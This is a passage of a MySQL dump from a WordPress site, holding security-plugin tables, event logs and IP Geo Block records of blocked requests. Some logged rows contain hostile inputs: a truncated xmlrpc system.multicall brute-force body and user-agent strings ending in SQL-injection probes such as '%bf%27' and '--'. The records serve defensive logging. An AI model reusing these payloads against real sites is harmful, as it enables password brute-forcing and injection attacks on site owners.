483557,0),(872,'user_login',1,1572483557,0),(873,'post_updated',1,1572483928,0),(874,'post_updated',1,1572483972,0),(875,'email_attempt_send',1,1572518457,0),(876,'test_cron_run',1,1572528203,0),(877,'wcf_scan_run',1,1572528262,0),(878,'ufc_scan_run',1,1572528262,0),(879,'apc_scan_run',1,1572528262,0),(880,'post_deleted',1,1572569453,0),(881,'test_cron_run',1,1572614525,0),(882,'apc_scan_run',1,1572614583,0),(883,'wcf_scan_run',1,1572614583,0),(884,'ufc_scan_run',1,1572614583,0),(885,'test_cron_run',1,1572700725,0),(886,'apc_scan_run',1,1572700782,0),(887,'wcf_scan_run',1,1572700782,0),(888,'ufc_scan_run',1,1572700782,0),(889,'test_cron_run',1,1572787114,0),(890,'apc_scan_run',1,1572787173,0),(891,'wcf_scan_run',1,1572787173,0),(892,'ufc_scan_run',1,1572787173,0),(893,'email_attempt_send',1,1572837861,0),(894,'email_attempt_send',1,1572839927,0),(895,'email_attempt_send',1,1572847279,0),(896,'test_cron_run',1,1572874336,0),(897,'wcf_scan_run',1,1572874394,0),(898,'ufc_scan_run',1,1572874394,0),(899,'apc_scan_run',1,1572874394,0),(900,'session_start',1,1572914137,0),(901,'user_login',1,1572914137,0),(902,'post_updated',1,1572914328,0),(903,'post_updated',1,1572919693,0),(904,'post_updated',1,1572924587,0),(905,'email_attempt_send',1,1572925831,0),(906,'post_updated',1,1572925860,0),(907,'post_updated',1,1572926132,0),(908,'post_published',1,1572926137,0),(909,'post_updated',1,1572926364,0),(910,'post_updated',1,1572926462,0),(911,'email_attempt_send',1,1572931513,0),(912,'email_attempt_send',1,1572941820,0),(913,'email_attempt_send',1,1572954582,0),(914,'test_cron_run',1,1572961611,0),(915,'wcf_scan_run',1,1572961685,0),(916,'ufc_scan_run',1,1572961685,0),(917,'apc_scan_run',1,1572961685,0),(918,'email_attempt_send',1,1573001370,0),(919,'session_terminate',1,1573006524,0),(920,'session_start',1,1573006524,0),(921,'user_login',1,1573006524,0),(922,'post_updated',1,1573015063,0),(923,'post_updated',1,1573020135,0),(924,'post_updated',1,1573020551,0),(925,'post_updated',1,1573020808,0),(926,'email_attempt_send',1,1573026968,0),(927,'test_cron_run',1,1573047232,0),(928,'wcf_scan_run',1,1573047286,0),(929,'ufc_scan_run',1,1573047286,0),(930,'apc_scan_run',1,1573047286,0),(931,'email_attempt_send',1,1573088437,0),(932,'email_attempt_send',1,1573101465,0),(933,'test_cron_run',1,1573133240,0),(934,'wcf_scan_run',1,1573133306,0),(935,'ufc_scan_run',1,1573133306,0),(936,'apc_scan_run',1,1573133306,0),(937,'email_attempt_send',1,1573198593,0),(938,'test_cron_run',1,1573219297,0),(939,'wcf_scan_run',1,1573219360,0),(940,'ufc_scan_run',1,1573219360,0),(941,'apc_scan_run',1,1573219360,0),(942,'test_cron_run',1,1573306021,0),(943,'wcf_scan_run',1,1573306079,0),(944,'ufc_scan_run',1,1573306079,0),(945,'apc_scan_run',1,1573306079,0),(946,'test_cron_run',1,1573392606,0),(947,'wcf_scan_run',1,1573392664,0),(948,'ufc_scan_run',1,1573392664,0),(949,'apc_scan_run',1,1573392664,0),(950,'email_attempt_send',1,1573429315,0),(951,'email_attempt_send',1,1573452148,0),(952,'test_cron_run',1,1573478589,0),(953,'wcf_scan_run',1,1573478649,0),(954,'ufc_scan_run',1,1573478649,0),(955,'apc_scan_run',1,1573478649,0),(956,'email_attempt_send',1,1573555969,0),(957,'test_cron_run',1,1573565339,0),(958,'wcf_scan_run',1,1573565397,0),(959,'ufc_scan_run',1,1573565397,0),(960,'apc_scan_run',1,1573565397,0),(961,'email_attempt_send',1,1573614749,0),(962,'email_attempt_send',1,1573618805,0),(963,'email_attempt_send',1,1573618808,0),(964,'email_attempt_send',1,1573629792,0),(965,'test_cron_run',1,1573651677,0),(966,'wcf_scan_run',1,1573651735,0),(967,'ufc_scan_run',1,1573651735,0),(968,'apc_scan_run',1,1573651735,0),(969,'email_attempt_send',1,1573689381,0),(970,'email_attempt_send',1,1573695007,0),(971,'test_cron_run',1,1573737821,0),(972,'wcf_scan_run',1,1573737877,0),(973,'ufc_scan_run',1,1573737877,0),(974,'apc_scan_run',1,1573737877,0);
/*!40000 ALTER TABLE `wpdp_icwp_wpsf_events` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_icwp_wpsf_geoip`
--

DROP TABLE IF EXISTS `wpdp_icwp_wpsf_geoip`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_icwp_wpsf_geoip` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `ip` varbinary(16) DEFAULT NULL COMMENT 'IP Address',
  `meta` text COLLATE utf8mb4_unicode_ci,
  `created_at` int(15) unsigned NOT NULL DEFAULT '0',
  `deleted_at` int(15) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_icwp_wpsf_geoip`
--

LOCK TABLES `wpdp_icwp_wpsf_geoip` WRITE;
/*!40000 ALTER TABLE `wpdp_icwp_wpsf_geoip` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_icwp_wpsf_geoip` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_icwp_wpsf_ip_lists`
--

DROP TABLE IF EXISTS `wpdp_icwp_wpsf_ip_lists`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_icwp_wpsf_ip_lists` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `ip` varchar(40) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `label` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `list` varchar(4) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `ip6` tinyint(1) NOT NULL DEFAULT '0',
  `is_range` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `transgressions` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `last_access_at` int(15) unsigned NOT NULL DEFAULT '0',
  `created_at` int(15) unsigned NOT NULL DEFAULT '0',
  `deleted_at` int(15) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_icwp_wpsf_ip_lists`
--

LOCK TABLES `wpdp_icwp_wpsf_ip_lists` WRITE;
/*!40000 ALTER TABLE `wpdp_icwp_wpsf_ip_lists` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_icwp_wpsf_ip_lists` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_icwp_wpsf_notes`
--

DROP TABLE IF EXISTS `wpdp_icwp_wpsf_notes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_icwp_wpsf_notes` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `wp_username` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'unknown',
  `note` text COLLATE utf8mb4_unicode_ci,
  `created_at` int(15) unsigned NOT NULL DEFAULT '0',
  `deleted_at` int(15) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_icwp_wpsf_notes`
--

LOCK TABLES `wpdp_icwp_wpsf_notes` WRITE;
/*!40000 ALTER TABLE `wpdp_icwp_wpsf_notes` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_icwp_wpsf_notes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_icwp_wpsf_scanner`
--

DROP TABLE IF EXISTS `wpdp_icwp_wpsf_scanner`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_icwp_wpsf_scanner` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `hash` varchar(32) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'Unique Item Hash',
  `meta` text COLLATE utf8mb4_unicode_ci COMMENT 'Relevant Item Data',
  `scan` varchar(10) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '0' COMMENT 'Scan Type',
  `severity` int(3) NOT NULL DEFAULT '1' COMMENT 'Severity',
  `ignored_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'TS Ignored',
  `notified_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'TS Last Notified',
  `created_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'TS Discovered',
  `deleted_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'TS Soft Deleted',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_icwp_wpsf_scanner`
--

LOCK TABLES `wpdp_icwp_wpsf_scanner` WRITE;
/*!40000 ALTER TABLE `wpdp_icwp_wpsf_scanner` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_icwp_wpsf_scanner` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_icwp_wpsf_scanq`
--

DROP TABLE IF EXISTS `wpdp_icwp_wpsf_scanq`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_icwp_wpsf_scanq` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `scan` varchar(3) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '0' COMMENT 'Scan Slug',
  `items` text COLLATE utf8mb4_unicode_ci COMMENT 'Array of scan items',
  `results` text COLLATE utf8mb4_unicode_ci COMMENT 'Array of results',
  `meta` text COLLATE utf8mb4_unicode_ci COMMENT 'Meta Data',
  `started_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'TS Started',
  `finished_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'TS Finished',
  `created_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'TS Created',
  `deleted_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'TS Soft Deleted',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2292 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_icwp_wpsf_scanq`
--

LOCK TABLES `wpdp_icwp_wpsf_scanq` WRITE;
/*!40000 ALTER TABLE `wpdp_icwp_wpsf_scanq` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_icwp_wpsf_scanq` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_icwp_wpsf_sessions`
--

DROP TABLE IF EXISTS `wpdp_icwp_wpsf_sessions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_icwp_wpsf_sessions` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `session_id` varchar(32) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `wp_username` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `ip` varchar(40) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '0',
  `browser` varchar(32) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `logged_in_at` int(15) NOT NULL DEFAULT '0',
  `last_activity_at` int(15) unsigned NOT NULL DEFAULT '0',
  `last_activity_uri` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `li_code_email` varchar(6) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `login_intent_expires_at` int(15) unsigned NOT NULL DEFAULT '0',
  `secadmin_at` int(15) unsigned NOT NULL DEFAULT '0',
  `created_at` int(15) unsigned NOT NULL DEFAULT '0',
  `deleted_at` int(15) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=17 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_icwp_wpsf_sessions`
--

LOCK TABLES `wpdp_icwp_wpsf_sessions` WRITE;
/*!40000 ALTER TABLE `wpdp_icwp_wpsf_sessions` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_icwp_wpsf_sessions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_icwp_wpsf_statistics`
--

DROP TABLE IF EXISTS `wpdp_icwp_wpsf_statistics`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_icwp_wpsf_statistics` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `stat_key` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '0',
  `parent_stat_key` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `tally` int(11) unsigned NOT NULL DEFAULT '0',
  `created_at` int(15) unsigned NOT NULL DEFAULT '0',
  `modified_at` int(15) unsigned NOT NULL DEFAULT '0',
  `deleted_at` int(15) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_icwp_wpsf_statistics`
--

LOCK TABLES `wpdp_icwp_wpsf_statistics` WRITE;
/*!40000 ALTER TABLE `wpdp_icwp_wpsf_statistics` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_icwp_wpsf_statistics` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_icwp_wpsf_traffic`
--

DROP TABLE IF EXISTS `wpdp_icwp_wpsf_traffic`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_icwp_wpsf_traffic` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `rid` varchar(10) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'Request ID',
  `uid` int(11) unsigned NOT NULL DEFAULT '0' COMMENT 'User ID',
  `ip` varbinary(16) DEFAULT NULL COMMENT 'Visitor IP Address',
  `path` text COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'Request Path or URI',
  `code` int(5) NOT NULL DEFAULT '200' COMMENT 'HTTP Response Code',
  `verb` varchar(10) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'get' COMMENT 'HTTP Method',
  `ua` text COLLATE utf8mb4_unicode_ci COMMENT 'Browser User Agent String',
  `trans` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT 'Trangression',
  `created_at` int(15) unsigned NOT NULL DEFAULT '0',
  `deleted_at` int(15) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_icwp_wpsf_traffic`
--

LOCK TABLES `wpdp_icwp_wpsf_traffic` WRITE;
/*!40000 ALTER TABLE `wpdp_icwp_wpsf_traffic` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_icwp_wpsf_traffic` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_ip_geo_block_cache`
--

DROP TABLE IF EXISTS `wpdp_ip_geo_block_cache`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_ip_geo_block_cache` (
  `No` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `time` int(10) unsigned NOT NULL DEFAULT '0',
  `hook` varchar(8) COLLATE utf8mb4_unicode_ci NOT NULL,
  `ip` varbinary(96) NOT NULL,
  `asn` varchar(8) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `code` varchar(2) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'ZZ',
  `auth` int(10) unsigned NOT NULL DEFAULT '0',
  `fail` int(10) unsigned NOT NULL DEFAULT '0',
  `reqs` int(10) unsigned NOT NULL DEFAULT '0',
  `last` int(10) unsigned NOT NULL DEFAULT '0',
  `view` int(10) unsigned NOT NULL DEFAULT '0',
  `host` varbinary(512) DEFAULT NULL,
  PRIMARY KEY (`No`),
  UNIQUE KEY `ip` (`ip`)
) ENGINE=MyISAM AUTO_INCREMENT=5622 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_ip_geo_block_cache`
--

LOCK TABLES `wpdp_ip_geo_block_cache` WRITE;
/*!40000 ALTER TABLE `wpdp_ip_geo_block_cache` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_ip_geo_block_cache` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_ip_geo_block_logs`
--

DROP TABLE IF EXISTS `wpdp_ip_geo_block_logs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_ip_geo_block_logs` (
  `No` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `time` int(10) unsigned NOT NULL DEFAULT '0',
  `ip` varbinary(96) NOT NULL,
  `asn` varchar(8) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `hook` varchar(8) COLLATE utf8mb4_unicode_ci NOT NULL,
  `auth` int(10) unsigned NOT NULL DEFAULT '0',
  `code` varchar(2) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'ZZ',
  `result` varchar(8) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `method` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `user_agent` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `headers` varbinary(512) DEFAULT NULL,
  `data` text COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`No`),
  KEY `time` (`time`),
  KEY `hook` (`hook`)
) ENGINE=MyISAM AUTO_INCREMENT=15816 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_ip_geo_block_logs`
--

LOCK TABLES `wpdp_ip_geo_block_logs` WRITE;
/*!40000 ALTER TABLE `wpdp_ip_geo_block_logs` DISABLE KEYS */;
INSERT INTO `wpdp_ip_geo_block_logs` (`No`, `time`, `ip`, `asn`, `hook`, `auth`, `code`, `result`, `method`, `user_agent`, `headers`, `data`) VALUES (15804,1573695258,'¹5sÆ—‰—)‚Äam8½’¼','','login',0,'US','blocked','GET[80]:/wp-login.php','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','/tC™¢Üû’§Y	¼Ôp>ž%Û¥üò20œL½K–Ïm“#-#gŸ-î¸	ùÏ{ÄD’Ú',''),(15780,1573639884,'í·-Š«†ˆ©î¯ÈFª','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 YaBrowser/18.2.1.196 Yowser/2.5 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡\'¯A-â—:LV0ÙXˆ!',''),(15805,1573709093,'Ì»;P73¾\'8Ÿ§þôÐ^','','login',0,'UA','blocked','GET[80]:/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','nñ8×µŒòb¯£\'MÁõ(¡à·Tªß­¢i€[a',''),(15806,1573712585,'ƒñ+g¥2´ƒ±äqCìðð','','admin',0,'SG','blocked','POST[443]:/wp-admin/admin-ajax.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36','¸m«,yýqËª¼,äà‹Çs*×Ïx¼±÷†NEÜÞ’zŒ´Ö÷°Û½§ul[÷Éñt­^}É/1ÍñŽrŒÎ¬³Å{·ê\'´\Z’0ªqd-}?#Ýß÷u®½@RžÜ³T\']åÞ0‡‘y¡Ÿr_dè*åaXˆ	¨ #_Ã:\0Þzi¾Ë”fS•‚ìG«ÎÞvw¾ÚJÝ\'‡ŠË','action=onepress_plus_ajax,onepress_ajax_action,post_id'),(15807,1573713655,'ƒñ+g¥2´ƒ±äqCìðð','','admin',0,'SG','blocked','POST[443]:/wp-admin/admin-ajax.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36','¸m«,yýqËª¼,äàÂGû›ÔÉøöš8Uè˜4>¥ë$šÒÂÍ§@¹kW\\Iæ:6Ï¬™¼P•â}>\n!+—WH÷ †=„9Ë^˜·\0=4õõ€££‘žxqxóÃÛ=“F¥î˜–¬ÃáÂ¡ùÜµ~ÖÞ·È;ª?¥>kY;','action=onepress_plus_ajax,onepress_ajax_action,post_id'),(15779,1573639881,'M¤uëdî3Y–ìù/N','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 YaBrowser/18.2.1.196 Yowser/2.5 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡\'¯A-â—:LV0ÙXˆ!',''),(15784,1573639893,'¨?:1g—¶–A³_íð¶','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 YaBrowser/18.2.1.196 Yowser/2.5 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15775,1573638022,'mDQDK\0öÞx=VJÏÅ','','login',0,'SG','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; MANMJS; rv:11.0) like Gecko','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15781,1573639886,'M¤uëdî3Y–ìù/N','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 YaBrowser/18.2.1.196 Yowser/2.5 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15776,1573638024,'mDQDK\0öÞx=VJÏÅ','','login',0,'SG','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; MANMJS; rv:11.0) like Gecko','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15570,1573213134,'IifxfÅ¾ðrÕñ×UGV','','login',0,'US','blocked','GET[443]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) DownloaderChrome/62.0.3202.75 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøw1Aôòö“,?!špq¼ŠhÄ£ò5 ú“P—ƒ:îIÚã´\0ò½=<RDÙTƒ±n¿/ÉdàÀ%”Ž¿AEÒY´ÎÂÜø¤nq?P–séì\'æãüô„Y¹1m&+!Ëž«ï#K\0–',''),(15684,1573442576,'šÊ…e¸ž¤Bu_ËÜ»','','xmlrpc',0,'RU','closed','GET[443]:/xmlrpc.php?rsd','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.2431.14 Safari/537.36?','?¶ÿ“	6?‡ÇäLÇK\ne˜ËÓMÝ †‘\0Ö2å¬\'+àÔ,E~*Š‚ŠCÓ›ÿÝ*Crj—UrŠÍ>áÔÉ4ást0>m\0øˆe*Pó:7K|0V/¥¢·zRhÌGI¬µG.ºr¦‹ÙÃ3\n',''),(15685,1573442581,'šÊ…e¸ž¤Bu_ËÜ»','','xmlrpc',0,'RU','closed','GET[443]:/xmlrpc.php?rsd','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.2817.117 Safari/537.36--','?¶ÿ“	6?‡ÇäLÇK\ne˜ËÓMÝ †‘\0Ö2å¬\'+àÔ,E~*Š‚ŠCÓ›ÿÝ*Crj—UrŠÍ>áÔÉ4ást0>m\0øˆe*Pó:7K|0V/¥¢·zRhÌGI¬µG.ºr¦‹ÙÃ3\n',''),(15686,1573442583,'šÊ…e¸ž¤Bu_ËÜ»','','xmlrpc',0,'RU','closed','GET[443]:/xmlrpc.php?rsd','Opera/9.80 (Android; Opera Mini/7.5.54678/28.2555; U; ru) Presto/2.10.289 Version/12.02%bf%27','?¶ÿ“	6?‡ÇäLÇK\ne˜ËÓMÝ †‘\0Ö2å¬\'+àÔ,E~*Š‚ŠCÓ›ÿÝ*Crj—UrŠÍ>áÔÉ4ást0>m\0øˆe*Pó:7K|0V/¥¢·zRhÌGI¬µG.ºr¦‹ÙÃ3\n',''),(15687,1573450256,'äÏ&Ru¡åáí¾ð®å®','','xmlrpc',0,'CN','closed','POST[80]:/xmlrpc.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','nñ8×µŒòb¯£\'MÁõ(¡à·Tªß­¢i€[a','<?xml version=\"1.0\"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data><value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><dâ€¦'),(15689,1573451767,'\n)aCqÊ>ýAÖ…C','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15690,1573451770,'[k•àK?–ÿfzjÅ	P','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15672,1573420299,'$Xìc^_î9\\','','login',0,'KE','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 YaBrowser/18.3.1.1232 Yowser/2.5 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15671,1573420297,'$Xìc^_î9\\','','login',0,'KE','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 YaBrowser/18.3.1.1232 Yowser/2.5 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15683,1573442574,'šÊ…e¸ž¤Bu_ËÜ»','','xmlrpc',0,'RU','closed','GET[443]:/xmlrpc.php?rsd','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3477.20 